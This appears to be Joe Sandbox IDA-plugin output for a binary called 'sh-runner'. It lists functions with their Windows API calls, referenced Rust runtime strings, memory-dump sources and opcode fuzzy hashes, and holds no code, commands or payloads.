GetLastError.KERNEL32 ref: 00007FF72BD1D784
GetLastError.KERNEL32 ref: 00007FF72BD1D7EE

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ConsoleErrorLastWrite$ByteCharMultiWide
String ID:
API String ID: 1956605914-0
Opcode ID: b43c517ede8375b8634f024f2367b67a82169b3cb35f27ec5b2def54cb46485d
Instruction ID: bef4adc7fa7ffffa9471ed2e76cfe4437212540e3d60d813b1f289a4092d1edc
Opcode Fuzzy Hash: b43c517ede8375b8634f024f2367b67a82169b3cb35f27ec5b2def54cb46485d
Instruction Fuzzy Hash: 6C510171E186A245FB29AB38DC443F9E261FB84394FC44131D94D47AE9DF3CA585CB20

Function 00007FF72BD1BCE5 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD1BCEB
CloseHandle.KERNEL32 ref: 00007FF72BD1BD52
CloseHandle.KERNEL32 ref: 00007FF72BD1BD67
CloseHandle.KERNEL32 ref: 00007FF72BD1C224

Strings

program path has no file name, xrefs: 00007FF72BD1C290

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle
String ID: program path has no file name
API String ID: 2962429428-697003637
Opcode ID: 535f240628111b7be1e2573215e3df11fe582b422e1dfdffbf04f894117b0853
Instruction ID: 7a26ec27ba585dbc47542bd83a5de7b28ffd5551da19018bbbb02ba4d7e56bf6
Opcode Fuzzy Hash: 535f240628111b7be1e2573215e3df11fe582b422e1dfdffbf04f894117b0853
Instruction Fuzzy Hash: 40518865B1858285EB68BB6D9C003F99350EF89BD4FC41436DE0D4B7A5DE3DD5818B20

Function 00007FF72BD146D0 Relevance: 7.6, APIs: 5, Instructions: 115networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF72BD1473B
connect.WS2_32 ref: 00007FF72BD14794
WSAGetLastError.WS2_32 ref: 00007FF72BD147A2
ioctlsocket.WS2_32 ref: 00007FF72BD147D1

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$connectioctlsocket
String ID:
API String ID: 1971785428-0
Opcode ID: 91752de680eb7810e5663d0e633616ae3bc0b1b21d747f07152cb76fdf5c0dff
Instruction ID: 484bb9a0b74d3df712dbefd9adbe66c4a5bd10612a28d773d19cbedc6ead51e0
Opcode Fuzzy Hash: 91752de680eb7810e5663d0e633616ae3bc0b1b21d747f07152cb76fdf5c0dff
Instruction Fuzzy Hash: 41414932A1869241E778AA79AC403F8B250EB49B94F985136CE5D477A4DF3CF481CF60

Function 00007FF72BD1CB70 Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF72BD1CB7F
GetLastError.KERNEL32 ref: 00007FF72BD1CB8F
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72BD1C5F1), ref: 00007FF72BD1CC12
DuplicateHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD1C5F1), ref: 00007FF72BD1CC3C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD1C5F1), ref: 00007FF72BD1CC4D

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorHandleLast$CurrentDuplicateProcess
String ID:
API String ID: 3697983210-0
Opcode ID: a703a5d9bf1d374bf201233f2e3415584f43e3240198f924f84827e9e5f8ce52
Instruction ID: e63daff8a6a12a876e1c5ed5616cb04c2e04449ade3c192eb451cafc03b25b04
Opcode Fuzzy Hash: a703a5d9bf1d374bf201233f2e3415584f43e3240198f924f84827e9e5f8ce52
Instruction Fuzzy Hash: 5C214861B2864140FF28A67A99013FD9651EB89BD0F888139DE6D4B7D5CE3DD4819B20

Function 00007FF72BD10190 Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

SetFileInformationByHandle.KERNEL32 ref: 00007FF72BD101EA
GetLastError.KERNEL32 ref: 00007FF72BD101F3
SetFileInformationByHandle.KERNEL32 ref: 00007FF72BD10222
CloseHandle.KERNEL32 ref: 00007FF72BD10230
GetLastError.KERNEL32 ref: 00007FF72BD10250

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Handle$ErrorFileInformationLast$Close
String ID:
API String ID: 3114385310-0
Opcode ID: dcc3e9db81ffaae64ca45b346fab4df8695325788677632439c8d9e62b369b85
Instruction ID: 7a5847d94ac7ab56b90fc64982a8b7baa6e7a12f7feb4669afbea51d7e3538f7
Opcode Fuzzy Hash: dcc3e9db81ffaae64ca45b346fab4df8695325788677632439c8d9e62b369b85
Instruction Fuzzy Hash: BF21A871F1864199F729B9B99C003F95650DBC9788FD45031DE4C67BE6CE3DD9828B20

Function 00007FF72BD22190 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00007FF72BD28445,?,?,?), ref: 00007FF72BD221D3
InitOnceComplete.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00007FF72BD28445,?,?,?), ref: 00007FF72BD2221E

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD223C0
assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD223D8

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AllocCompleteInitOnce
String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 622421136-3544120690
Opcode ID: 8f7ae1cc7c3d373884c9017de4c86b9173f1b479400807a83c12ee046cfc920e
Instruction ID: 668229c6aa73267eb81562606c5fd13c43b96d1821f04b904844c348cb0e2b8c
Opcode Fuzzy Hash: 8f7ae1cc7c3d373884c9017de4c86b9173f1b479400807a83c12ee046cfc920e
Instruction Fuzzy Hash: 0971C532A0479186E718EF68E8403ECB770FB45758FA48035EA4D43661DF3DE585CB60

Function 00007FF72BD1E019 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF72BD1E064
GetLastError.KERNEL32 ref: 00007FF72BD1E07D
CloseHandle.KERNEL32 ref: 00007FF72BD1E0ED

Part of subcall function 00007FF72BD6A710: RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
Part of subcall function 00007FF72BD6A710: RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7B2
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7D0

Strings

SystemTime, xrefs: 00007FF72BD1E10F

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: abort$CaptureCloseContextErrorHandleLastObjectSingleUnwindWait
String ID: SystemTime
API String ID: 2659168121-2656138
Opcode ID: 05cc99c28346786777d0b7d17e9c6535537345cd89bd38ba16040cca04a3ed61
Instruction ID: d70287ad2fea296e6b3da8284bdc184e260d9e4d4c2cdc9152ccfba930141376
Opcode Fuzzy Hash: 05cc99c28346786777d0b7d17e9c6535537345cd89bd38ba16040cca04a3ed61
Instruction Fuzzy Hash: C4319F26F04A0299FB08BB69E8413FC6764EF49794F944135DE5C13BA9DF3CA186CB60

Function 00007FF72BD6B2A3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF72BD6B362

Strings

CCG , xrefs: 00007FF72BD6B2C5

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 382e44d18ca0bd6a33c73706964a02664b84bef3567954fdc5be9eec53e919d1
Instruction ID: eebac0f29457a9b75ed55a3fefa09849f0d4ef5bde0b822b83377eb0a44ab1ba
Opcode Fuzzy Hash: 382e44d18ca0bd6a33c73706964a02664b84bef3567954fdc5be9eec53e919d1
Instruction Fuzzy Hash: 5C215E21F0ED0A42FB6C36ADA9533F99281DF4D354F98443ECA1E823F5DD1CA8814A32

Function 00007FF72BD1EE3D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF72BD1EEE9
GetProcAddress.KERNEL32 ref: 00007FF72BD1EEFD

Strings

kernel32, xrefs: 00007FF72BD1EEE2
SetThreadDescription, xrefs: 00007FF72BD1EEF3

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: b72f721979762e52428eef455a9ef1fe81a4105e4d188751f34c40cc1a778e0e
Instruction ID: 5fa9c738daf40ff215e5723996a05b2d8457e6bc4e280605501dde0486386f1f
Opcode Fuzzy Hash: b72f721979762e52428eef455a9ef1fe81a4105e4d188751f34c40cc1a778e0e
Instruction Fuzzy Hash: A8118465F19A4282FF2DBB6E9D403F4D251EF88BC4F889036DD0D47BAADE5CE5414A20

Function 00007FF72BD10376 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32 ref: 00007FF72BD10386
memcpy.MSVCRT ref: 00007FF72BD103C4
GetLastError.KERNEL32 ref: 00007FF72BD103DF

Strings

., xrefs: 00007FF72BD1038F

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorFileFindLastNextmemcpy
String ID: .
API String ID: 3684451505-248832578
Opcode ID: d9e1823e202fd63e5097a96fa8076ebd8c355dd65ab2e01eae2bab921ffa5412
Instruction ID: 237387add3b12cd04daf664f6071e1644ad15d6b407e320a57a02ff7ce71bc14
Opcode Fuzzy Hash: d9e1823e202fd63e5097a96fa8076ebd8c355dd65ab2e01eae2bab921ffa5412
Instruction Fuzzy Hash: D711B216B28A0286FB65B678A8403F8A260EB84754FC45031DE89622D1DE7CE4C18724

Function 00007FF72BD1EE61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF72BD1EEE9
GetProcAddress.KERNEL32 ref: 00007FF72BD1EEFD

Strings

kernel32, xrefs: 00007FF72BD1EEE2
SetThreadDescription, xrefs: 00007FF72BD1EEF3

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: 9d98af57cb7f6c7cd1ed0284d0bea0d51cbf6c989ff939cb8e803f8eba04e7de
Instruction ID: 2fe04dd3d23c7fa84ac87b97d2dd90c29cafc7ec6054868a0096f36554c3ab4d
Opcode Fuzzy Hash: 9d98af57cb7f6c7cd1ed0284d0bea0d51cbf6c989ff939cb8e803f8eba04e7de
Instruction Fuzzy Hash: C8119661F1594282FB2DBB699D403F4D251EF88BC4F848035DD0D47BA9DE5CE5414B20

Function 00007FF72BD1EF50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF72BD1EF68
GetProcAddress.KERNEL32 ref: 00007FF72BD1EF7C

Strings

kernel32, xrefs: 00007FF72BD1EF61
GetTempPath2W, xrefs: 00007FF72BD1EF72

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetTempPath2W$kernel32
API String ID: 1646373207-407914046
Opcode ID: 692419809c08872f70c7ab20a927c7a81e82b9fdef07110db430cab33fcee5b3
Instruction ID: 4bc0ebd65f286d9d2a80d85bf88e2cc4a0892110eeef333a635deec80273f5e3
Opcode Fuzzy Hash: 692419809c08872f70c7ab20a927c7a81e82b9fdef07110db430cab33fcee5b3
Instruction Fuzzy Hash: BBF05E11E0AA82D5FB1DA769AC000F4E690EF88390EC8443ADD8D027B9DE6CA9458A20

Function 00007FF72BD081A0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BD08202
memcpy.MSVCRT ref: 00007FF72BD082E1
memcpy.MSVCRT ref: 00007FF72BD084CD

Strings

assertion failed: is_code_point_boundary(self, new_len), xrefs: 00007FF72BD08327

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: is_code_point_boundary(self, new_len)
API String ID: 3510742995-9383156
Opcode ID: 865f7bd252a8e5ea9300757f2581f44efe6acb517dea27171c525fc87d244e35
Instruction ID: ff050041c1ef5f32dde9791e056a2496fd9e77a8443946d02c072e0718467af8
Opcode Fuzzy Hash: 865f7bd252a8e5ea9300757f2581f44efe6acb517dea27171c525fc87d244e35
Instruction Fuzzy Hash: E7B1D752F08A8645FA19AB6A9C002FDA761FF55BC8F848831DE4D177A6DE3DF1818620

Function 00007FF72BD1CA4A Relevance: 6.3, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD1CB5A
CloseHandle.KERNEL32 ref: 00007FF72BD1CA50

Part of subcall function 00007FF72BD6A710: RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
Part of subcall function 00007FF72BD6A710: RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7B2
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7D0

Part of subcall function 00007FF72BCD4940: CloseHandle.KERNEL32 ref: 00007FF72BCD4980
Part of subcall function 00007FF72BCD4940: CloseHandle.KERNEL32 ref: 00007FF72BCD4988

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$abort$CaptureContextUnwind
String ID:
API String ID: 2434310364-0
Opcode ID: e6e4b6c425bf33ef89f3fbf5109c147b163b7af8cfe7a1939f6f4eb98d6596d1
Instruction ID: 3986d4feafc3d44d0b87a0ed132f5eb0e47087a89acf6dc388f4ebbac1bde2e4
Opcode Fuzzy Hash: e6e4b6c425bf33ef89f3fbf5109c147b163b7af8cfe7a1939f6f4eb98d6596d1
Instruction Fuzzy Hash: 00116021A1844381FA0EFA79DC112FD9360EF85B80FD4AC31D91E4A6F2DE3DA581DA64

Function 00007FF72BD1C9F9 Relevance: 6.3, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD1CB2F
CloseHandle.KERNEL32 ref: 00007FF72BD1CB37
CloseHandle.KERNEL32 ref: 00007FF72BD1CB3F
CloseHandle.KERNEL32 ref: 00007FF72BD1CA16

Part of subcall function 00007FF72BD6A710: RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
Part of subcall function 00007FF72BD6A710: RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7B2
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7D0

CloseHandle.KERNEL32 ref: 00007FF72BD1CB5A

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$abort$CaptureContextUnwind
String ID:
API String ID: 2434310364-0
Opcode ID: dd6a2ee4e16ff2eddf31d770df4b0bc98426b889c6779ed1a36cb6aa39b7d2e5
Instruction ID: 84f428494a5cdc87ae875bc748076b3cc446f7533140cf992a3d068f74f4f79d
Opcode Fuzzy Hash: dd6a2ee4e16ff2eddf31d770df4b0bc98426b889c6779ed1a36cb6aa39b7d2e5
Instruction Fuzzy Hash: 17F0E111B0855341F90DFA6A9C113FD9650EF8AFC0FC49834EC6E4B7A7CD2EA5825B25

Function 00007FF72BD20090 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BD201D1
memcpy.MSVCRT ref: 00007FF72BD20360
memcpy.MSVCRT ref: 00007FF72BD20417

Part of subcall function 00007FF72BD45A75: memcpy.MSVCRT ref: 00007FF72BD45BFF

Strings

program path has no file name, xrefs: 00007FF72BD2009B

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
